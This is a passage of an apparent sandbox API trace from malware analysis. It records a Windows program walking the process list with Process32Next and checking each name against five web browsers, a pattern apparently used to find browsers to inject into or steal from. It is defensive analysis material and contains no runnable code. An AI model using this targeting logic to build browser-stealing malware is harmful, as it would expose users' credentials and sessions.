[0182.198] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.198] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.198] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.198] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.198] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0182.198] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.198] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.199] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.199] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.199] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.199] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0182.199] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.199] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0182.199] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0182.199] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0182.199] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0182.200] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0182.200] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.200] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0182.200] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0182.200] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0182.200] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0182.200] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0182.200] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.200] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0182.201] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0182.201] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0182.201] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0182.201] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0182.201] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.201] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.201] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.201] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.201] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.201] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0182.201] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.202] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0182.202] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0182.202] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0182.202] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0182.202] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0182.202] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.202] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0182.203] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0182.203] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0182.203] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0182.203] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0182.203] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.203] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0182.203] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0182.203] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0182.203] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0182.203] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0182.203] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.203] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0182.204] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0182.204] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0182.204] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0182.204] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0182.204] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.204] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0182.204] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0182.204] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0182.204] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0182.204] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0182.204] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.205] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0182.205] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0182.205] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0182.205] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0182.205] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0182.205] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.205] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0182.206] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0182.206] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0182.206] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0182.206] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0182.206] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.206] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0182.206] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0182.206] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0182.206] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0182.206] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0182.206] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.206] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0182.207] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0182.207] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0182.207] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0182.207] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0182.207] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.207] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0182.207] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0182.207] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0182.207] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0182.207] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0182.208] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.208] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0182.208] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0182.208] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0182.208] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0182.208] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0182.208] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.208] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0182.209] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0182.209] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0182.209] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0182.209] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0182.209] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.209] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0182.209] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0182.209] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0182.209] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0182.209] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0182.209] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.209] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0182.210] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0182.210] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0182.210] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0182.210] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0182.210] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.210] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0182.210] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0182.211] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0182.211] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0182.211] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0182.211] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.211] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0182.211] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0182.211] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0182.211] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0182.211] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0182.211] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.211] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0182.212] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0182.212] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0182.212] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0182.212] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0182.212] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.212] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0182.212] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0182.212] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0182.212] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0182.212] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0182.212] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.212] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0182.213] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0182.213] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0182.213] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0182.213] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0182.213] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.213] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0182.213] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0182.213] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0182.214] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0182.214] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0182.214] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.214] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0182.214] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0182.214] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0182.214] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0182.214] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0182.214] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.214] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0182.215] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0182.215] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0182.215] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0182.215] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0182.215] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.215] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.215] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0182.215] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0182.215] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0182.215] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0182.215] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.215] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.216] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.216] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.216] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.216] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0182.216] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.216] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0182.216] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0182.216] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0182.216] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0182.216] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0182.216] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.216] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.217] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.217] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.217] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.217] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0182.217] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.217] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0182.218] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0182.218] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0182.218] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0182.218] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0182.218] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.218] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.218] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.218] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.218] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.218] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0182.218] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.218] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.219] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0182.219] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0182.219] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0182.219] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0182.219] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.219] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0182.219] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0182.219] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0182.219] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0182.219] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0182.219] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.219] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, 